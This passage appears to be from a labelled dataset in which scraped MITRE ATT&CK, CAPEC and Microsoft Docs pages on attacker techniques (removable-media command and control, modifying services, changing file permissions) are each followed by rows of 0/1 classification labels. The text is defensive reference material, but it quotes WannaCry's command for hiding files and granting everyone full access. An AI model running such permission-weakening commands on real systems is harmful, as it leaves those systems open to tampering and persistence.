Analysis Report (MAR) - 10135536-B. Retrieved July 17, 2018. Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018. US-CERT. (2017, November 22). Alert (TA17-318B): HIDDEN COBRA \xe2\x80\x93 North Korean Trojan: Volgmer. Retrieved December 7, 2017. Hayashi, K. (2005, August 18). Backdoor.Darkmoon. Retrieved February 23, 2018. Lee, B. Grunzweig, J. (2015, December 22). BBSRAT Attacks Targeting Russian Organizations Linked to Roaming Tiger. Retrieved August 19, 2016. US-CERT. (2018, June 14). MAR-10135536-12 \xe2\x80\x93 North Korean Trojan: TYPEFRAME. Retrieved July 13, 2018. Computer Incident Response Center Luxembourg. (2013, March 29). Analysis of a PlugX variant. Retrieved November 5, 2018. Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018. Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018. Grunzweig, J., Lee, B. (2016, January 22). New Attacks Linked to C0d0so0 Group. Retrieved August 2, 2018. Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"CAPEC - CAPEC-551: Modify Existing Service (Version 3.1) Common Attack Pattern Enumeration and Classification A Community Resource for Identifying and Understanding Attacks Home > CAPEC List > CAPEC-551: Modify Existing Service (Version 3.1) \xc2 ID Lookup: Home About Overview Documents Use Cases Resources Glossary FAQs CAPEC List Latest Version Downloads Reports Archive Community Community Citations Vendor Usage Discussion List Related Activities News Current News Free Newsletter CAPEC on Twitter CAPEC on News Archive Search CAPEC-551: Modify Existing Service Attack Pattern ID: 551 Abstraction: Detailed Status: Draft Presentation Filter: Basic Complete Description When an operating system starts, it also starts programs called services or daemons. Modifying existing services may break existing services or may enable services that are disabled/not commonly used. Relationships The table(s) below shows the other attack patterns and high level categories that are related to this attack pattern. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to similar items that may exist at higher and lower levels of abstraction. In addition, relationships such as CanFollow, PeerOf, and CanAlsoBe are defined to show similar attack patterns that the user may want to explore. Nature Type ID Name ChildOf Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern. 542 Targeted Malware Mitigations Limit privileges of user accounts so service changes can only be performed by authorized administrators. Also monitor any service changes that may occur inadvertently. Related Weaknesses A Related Weakness relationship associates a weakness with this attack pattern. Each association implies a weakness that must exist for a given attack to be successful. If multiple weaknesses are associated with the attack pattern, then any of the weaknesses (but not necessarily all) may be present for the attack to be successful. Each related weakness is identified by a CWE identifier. CWE-ID Weakness Name 284 Improper Access Control 522 Insufficiently Protected Credentials Taxonomy Mappings Relevant to the ATT&CK taxonomy mapping Entry ID Entry Name 1031 Modify Existing Service Content History Submissions Submission Date Submitter Organization 2015-11-09 CAPEC Content Team The MITRE Corporation Modifications Modification Date Modifier Organization 2019-04-04 CAPEC Content Team The MITRE Corporation Updated Related_Weaknesses More information is available \xe2\x80\x94 Please select a different filter. Page Last Updated or Reviewed: July 31, 2018 \xc2 Use of the Common Attack Pattern Enumeration and Classification dictionary and classification taxonomy, and the associated references from this website, are subject to the Terms of Use. For more information, please email capec@mitre.org. CAPEC is sponsored by the U.S. Department of Homeland Security (DHS) Cybersecurity and Infrastructure Security Agency (CISA). Copyright \xc2\xa9 2007 - 2019, The MITRE Corporation. CAPEC and the CAPEC logo are trademarks of The MITRE Corporation. Privacy policy Terms of use Site Map Contact us \xc2","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Set up Recovery Actions to Take Place When a Service Fails | Microsoft Docs Skip to main content Contents Exit focus mode Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents Set up Recovery Actions to Take Place When a Service Fails 02/22/2013 2 minutes to read In this article Applies To: Windows 7, Windows 8, Windows Server 2008 R2, Windows Server 2012 If a service fails, you can use the Services snap-in to specify what action to take (for example, running a program or script) on the first or second service failure, or on subsequent failures. Membership in Account Operators , Domain Admins , Enterprise Admins , or equivalent, is the minimum required to complete this procedure. Review the details in ""Additional considerations"" in this topic. To set up recovery actions to take place when a service fails Click Start , in the Start Search box, type services.msc , and then press ENTER. In the details pane, right-click the service for which you want to set up recovery actions, and then click Properties . On the Recovery tab, click the action that you want in First failure , Second failure , and Subsequent failures , and then click OK . If you click Run a Program , under Run program , type the full path for the specified computer. Universal Naming Convention (UNC) names are not supported. For example, type C:\\scripts\\handlefailure.cmd , rather than \\\\computername\\c$\\scripts\\handlefailure.cmd . Programs or scripts that you specify should not require user input. If you click Restart the Computer , click Restart Computer Options to specify how long the computer waits before restarting. You can also create a message to send automatically to remote users before the computer restarts. Select Enable actions for stops with errors in order to trigger the recovery actions that the service stopped with an error. Additional considerations To perform this procedure, you must be a member of the Account Operators group, the Domain Admins group, the Enterprise Admins group, or you must have been delegated the appropriate authority. As a security best practice, consider using Run as to perform this procedure. Recovery actions are available only on computers running Windows\xc2 2000 or later. Additional references Services Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"Communication Through Removable Media - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise Communication Through Removable Media Communication Through Removable Media Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by Replication Through Removable Media. Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access. ID:\xc2 T1092 Tactic: Command And Control Platform:\xc2 Linux, macOS, Windows Data Sources:\xc2 File monitoring, Data loss prevention Version:\xc2 1.0 Mitigations Mitigation Description Disable or Remove Feature or Program Disable Autoruns if it is unnecessary. [1] Operating System Configuration Disallow or restrict removable media at an organizational policy level if they are not required for business operations. Examples Name Description APT28 APT28 uses a tool that captures information from air-gapped computers via an infected USB and transfers it to network-connected computer when the USB is inserted. [4] CHOPSTICK Part of APT28's operation involved using CHOPSTICK modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic. [2] [3] [4] USBStealer USBStealer drops commands for a second victim onto a removable media drive inserted into the first victim, and commands are executed when the drive is inserted into the second victim. [5] Detection Monitor file access on removable media. Detect processes that execute when removable media is mounted. References Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016. FireEye. (2015). APT28: A WINDOW INTO RUSSIA\xe2\x80\x99S CYBER ESPIONAGE OPERATIONS?. Retrieved August 19, 2015. ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016. Anthe, C. et al. (2015, October 19). Microsoft Security Intelligence Report Volume 19. Retrieved December 23, 2015. Calvet, J. (2014, November 11). Sednit Espionage Group Attacking Air-Gapped Networks. Retrieved January 4, 2017. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"File Permissions Modification - Enterprise | MITRE ATT&CK\xe2\x84\xa2 Matrices Tactics PRE-ATT&CK Enterprise Mobile Techniques PRE-ATT&CK Enterprise Mobile Mitigations Enterprise Mobile Groups Software Resources General Information Getting Started ATT&CKcon Working with ATT&CK FAQ Updates Previous Versions Related Projects Blog\xc2 Contribute Register to stream ATT&CKcon 2.0 October 29-30 ENTERPRISE ENTERPRISE MOBILE PRE-ATT&CK TECHNIQUES All Initial Access Drive-by Compromise Exploit Public-Facing Application External Remote Services Hardware Additions Replication Through Removable Media Spearphishing Attachment Spearphishing Link Spearphishing via Service Supply Chain Compromise Trusted Relationship Valid Accounts Execution AppleScript CMSTP Command-Line Interface Compiled HTML File Control Panel Items Dynamic Data Exchange Execution through API Execution through Module Load Exploitation for Client Execution Graphical User Interface InstallUtil Launchctl Local Job Scheduling LSASS Driver Mshta PowerShell Regsvcs/Regasm Regsvr32 Rundll32 Scheduled Task Scripting Service Execution Signed Binary Proxy Execution Signed Script Proxy Execution Source Space after Filename Third-party Software Trap Trusted Developer Utilities User Execution Windows Management Instrumentation Windows Remote Management XSL Script Processing Persistence .bash_profile and .bashrc Accessibility Features Account Manipulation AppCert DLLs AppInit DLLs Application Shimming Authentication Package BITS Jobs Bootkit Browser Extensions Change Default File Association Component Firmware Component Object Model Hijacking Create Account DLL Search Order Hijacking Dylib Hijacking External Remote Services File System Permissions Weakness Hidden Files and Directories Hooking Hypervisor Image File Execution Options Injection Kernel Modules and Extensions Launch Agent Launch Daemon Launchctl LC_LOAD_DYLIB Addition Local Job Scheduling Login Item Logon Scripts LSASS Driver Modify Existing Service Netsh Helper DLL New Service Office Application Startup Path Interception Plist Modification Port Knocking Port Monitors Rc.common Re-opened Applications Redundant Access Registry Run Keys / Startup Folder Scheduled Task Screensaver Security Support Provider Service Registry Permissions Weakness Setuid and Setgid Shortcut Modification SIP and Trust Provider Hijacking Startup Items System Firmware Systemd Service Time Providers Trap Valid Accounts Web Shell Windows Management Instrumentation Event Subscription Winlogon Helper DLL Privilege Escalation Access Token Manipulation Accessibility Features AppCert DLLs AppInit DLLs Application Shimming Bypass User Account Control DLL Search Order Hijacking Dylib Hijacking Exploitation for Privilege Escalation Extra Window Memory Injection File System Permissions Weakness Hooking Image File Execution Options Injection Launch Daemon New Service Path Interception Plist Modification Port Monitors Process Injection Scheduled Task Service Registry Permissions Weakness Setuid and Setgid SID-History Injection Startup Items Sudo Sudo Caching Valid Accounts Web Shell Defense Evasion Access Token Manipulation Binary Padding BITS Jobs Bypass User Account Control Clear Command History CMSTP Code Signing Compile After Delivery Compiled HTML File Component Firmware Component Object Model Hijacking Control Panel Items DCShadow Deobfuscate/Decode Files or Information Disabling Security Tools DLL Search Order Hijacking DLL Side-Loading Execution Guardrails Exploitation for Defense Evasion Extra Window Memory Injection File Deletion File Permissions Modification File System Logical Offsets Gatekeeper Bypass Group Policy Modification Hidden Files and Directories Hidden Users Hidden Window HISTCONTROL Image File Execution Options Injection Indicator Blocking Indicator Removal from Tools Indicator Removal on Host Indirect Command Execution Install Root Certificate InstallUtil Launchctl LC_MAIN Hijacking Masquerading Modify Registry Mshta Network Share Connection Removal NTFS File Attributes Obfuscated Files or Information Plist Modification Port Knocking Process Doppelg\xc3\xa4nging Process Hollowing Process Injection Redundant Access Regsvcs/Regasm Regsvr32 Rootkit Rundll32 Scripting Signed Binary Proxy Execution Signed Script Proxy Execution SIP and Trust Provider Hijacking Software Packing Space after Filename Template Injection Timestomp Trusted Developer Utilities Valid Accounts Virtualization/Sandbox Evasion Web Service XSL Script Processing Credential Access Account Manipulation Bash History Brute Force Credential Dumping Credentials in Files Credentials in Registry Exploitation for Credential Access Forced Authentication Hooking Input Capture Input Prompt Kerberoasting Keychain LLMNR/NBT-NS Poisoning and Relay Network Sniffing Password Filter DLL Private Keys Securityd Memory Two-Factor Authentication Interception Discovery Account Discovery Application Window Discovery Browser Bookmark Discovery Domain Trust Discovery File and Directory Discovery Network Service Scanning Network Share Discovery Network Sniffing Password Policy Discovery Peripheral Device Discovery Permission Groups Discovery Process Discovery Query Registry Remote System Discovery Security Software Discovery System Information Discovery System Network Configuration Discovery System Network Connections Discovery System Owner/User Discovery System Service Discovery System Time Discovery Virtualization/Sandbox Evasion Lateral Movement AppleScript Application Deployment Software Distributed Component Object Model Exploitation of Remote Services Logon Scripts Pass the Hash Pass the Ticket Remote Desktop Protocol Remote File Copy Remote Services Replication Through Removable Media Shared Webroot SSH Hijacking Taint Shared Content Third-party Software Windows Admin Shares Windows Remote Management Collection Audio Capture Automated Collection Clipboard Data Data from Information Repositories Data from Local System Data from Network Shared Drive Data from Removable Media Data Staged Email Collection Input Capture Man in the Browser Screen Capture Video Capture Command and Control Commonly Used Port Communication Through Removable Media Connection Proxy Custom Command and Control Protocol Custom Cryptographic Protocol Data Encoding Data Obfuscation Domain Fronting Domain Generation Algorithms Fallback Channels Multi-hop Proxy Multi-Stage Channels Multiband Communication Multilayer Encryption Port Knocking Remote Access Tools Remote File Copy Standard Application Layer Protocol Standard Cryptographic Protocol Standard Non-Application Layer Protocol Uncommonly Used Port Web Service Exfiltration Automated Exfiltration Data Compressed Data Encrypted Data Transfer Size Limits Exfiltration Over Alternative Protocol Exfiltration Over Command and Control Channel Exfiltration Over Other Network Medium Exfiltration Over Physical Medium Scheduled Transfer Impact Data Destruction Data Encrypted for Impact Defacement Disk Content Wipe Disk Structure Wipe Endpoint Denial of Service Firmware Corruption Inhibit System Recovery Network Denial of Service Resource Hijacking Runtime Data Manipulation Service Stop Stored Data Manipulation Transmitted Data Manipulation Home Techniques Enterprise File Permissions Modification File Permissions Modification File permissions are commonly managed by discretionary access control lists (DACLs) specified by the file owner. File DACL implementation may vary by platform, but generally explicitly designate which users/groups can perform which actions (ex: read, write, execute, etc.). [1] [2] [3] Adversaries may modify file permissions/attributes to evade intended DACLs. [4] [5] Modifications may include changing specific access rights, which may require taking ownership of a file and/or elevated permissions such as Administrator/root depending on the file's existing permissions to enable malicious activity such as modifying, replacing, or deleting specific files. Specific file modifications may be a required step for many techniques, such as establishing Persistence via Accessibility Features, Logon Scripts, or tainting/hijacking other instrumental binary/configuration files. ID:\xc2 T1222 Tactic: Defense Evasion Platform:\xc2 Linux, Windows, macOS Permissions Required:\xc2 User, Administrator, SYSTEM, root Data Sources:\xc2 File monitoring, Process monitoring, Process command-line parameters, Windows event logs Defense Bypassed:\xc2 File system access controls Contributors:\xc2 Jan Miller, CrowdStrike Version:\xc2 1.0 Mitigations This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Examples Name Description APT32 APT32's macOS backdoor changes the permission of the file it wants to execute to 755. [8] JPIN JPIN can use the command-line utility cacls.exe to change file permissions. [6] WannaCry WannaCry uses attrib +h and icacls . /grant Everyone:F /T /C /Q to make some of its files hidden and grant all users full access controls. [7] Detection Monitor and investigate attempts to modify DACLs and file ownership, such as use of icacls [9], takeown [10], attrib [11], and PowerShell Set-Acl [12] in Windows and chmod [13]/chown [14] in macOS/Linux. Many of these are built-in system utilities and may generate high false positive alerts, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible. Consider enabling file permission change auditing on folders containing key binary/configuration files. Windows Security Log events (Event ID 4670) are used when DACLs are modified. [15] References Microsoft. (2018, May 30). DACLs and ACEs. Retrieved August 19, 2018. Microsoft. (2018, May 30). File Security and Access Rights. Retrieved August 19, 2018. Tutorials Point. (n.d.). Unix / Linux - File Permission / Access Modes. Retrieved August 19, 2018. Hybrid Analysis. (2018, June 12). c9b65b764985dfd7a11d3faf599c56b8.exe. Retrieved August 19, 2018. Hybrid Analysis. (2018, May 30). 2a8efbfadd798f6111340f7c1c956bee.dll. Retrieved August 19, 2018. Windows Defender Advanced Threat Hunting Team. (2016, April 29). PLATINUM: Targeted attacks in South and Southeast Asia. Retrieved February 15, 2018. Noerenberg, E., Costis, A., and Quist, N. (2017, May 16). A Technical Analysis of WannaCry Ransomware. Retrieved March 25, 2019. Dumont, R.. (2019, April 9). OceanLotus: macOS malware update. Retrieved April 15, 2019. Plett, C. et al.. (2017, October 17). icacls. Retrieved August 19, 2018. Plett, C. et al.. (2017, October 15). takeown. Retrieved August 19, 2018. Plett, C. et al.. (2017, October 15). attrib. Retrieved August 19, 2018. Microsoft. (n.d.). Set-Acl. Retrieved August 19, 2018. MacKenzie, D. & Meyering, J. (n.d.). chmod(1) - Linux man page. Retrieved August 19, 2018. MacKenzie, D. & Meyering, J. (n.d.). chown(1) - Linux man page. Retrieved August 19, 2018. Netsurion. (2014, February 19). Monitoring File Permission Changes with the Windows Security Log. Retrieved August 19, 2018. Copyright \xc2\xa9 2015-2019, The MITRE Corporation. MITRE ATT&CK and ATT&CK are trademarks of The MITRE Corporation. Privacy Policy Terms of Use @MITREattack Contact","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"DACLs and ACEs - Windows applications | Microsoft Docs Skip to main content Contents Exit focus mode Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents DACLs and ACEs 05/31/2018 2 minutes to read In this article If a Windows object does not have a discretionary access control list (DACL), the system allows everyone full access to it. If an object has a DACL, the system allows only the access that is explicitly allowed by the access control entries (ACEs) in the DACL. If there are no ACEs in the DACL, the system does not allow access to anyone. Similarly, if a DACL has ACEs that allow access to a limited set of users or groups, the system implicitly denies access to all trustees not included in the ACEs. In most cases, you can control access to an object by using access-allowed ACEs; you do not need to explicitly deny access to an object. The exception is when an ACE allows access to a group and you want to deny access to a member of the group. To do this, place an access-denied ACE for the user in the DACL ahead of the access-allowed ACE for the group. Note that the order of the ACEs is important because the system reads the ACEs in sequence until access is granted or denied. The user's access-denied ACE must appear first; otherwise, when the system reads the group's access allowed ACE, it will grant access to the restricted user. The following illustration shows a DACL that denies access to one user and grants access to two groups. The members of Group A get Read, Write, and Execute access rights by accumulating the rights allowed to Group A and rights allowed to Everyone. The exception is Andrew, who is denied access by the access-denied ACE in spite of being a member of the Everyone Group. \xc2 \xc2 Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks Is this page helpful? Yes No Any additional feedback? Skip Submit Thank you. In this article Previous Version Docs Blog Contribute Privacy & Cookies Terms of Use Site Feedback Trademarks","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0"
-"File Security and Access Rights - Windows applications | Microsoft Docs Skip to main content Contents Exit focus mode Edit Share Twitter LinkedIn Facebook Email Theme Light Dark High contrast Sign in Profile Sign out Contents File Security and Access Rights 05/31/2018 6 minutes to read In this article Because files are securable objects, access to them is regulated by the access-control model that governs access to all other securable objects in Windows. For a detailed explanation of this model, see Access Control. You can specify a security descriptor for a file or directory when you call the CreateFile, CreateDirectory, or CreateDirectoryEx function. If you specify NULL for the lpSecurityAttributes parameter, the file or directory gets a default security descriptor. The access control lists (ACL) in the default security descriptor for a file or directory are inherited from its parent directory. Note that a default security descriptor is assigned only when a file or directory is newly created, and not when it is renamed or moved. To retrieve the security descriptor of a file or directory object, call the GetNamedSecurityInfo or GetSecurityInfo function. To change the security descriptor of a file or directory object, call the SetNamedSecurityInfo or SetSecurityInfo function. The valid access rights for files and directories include the DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, and SYNCHRONIZE standard access rights. The table in File Access Rights Constants lists the access rights that are specific to files and directories. Although the SYNCHRONIZE access right is defined within the standard access rights list as the right to specify a file handle in one of the wait functions, when using asynchronous file I/O operations you should wait on the event handle contained in a properly configured OVERLAPPED structure rather than using the file handle with the 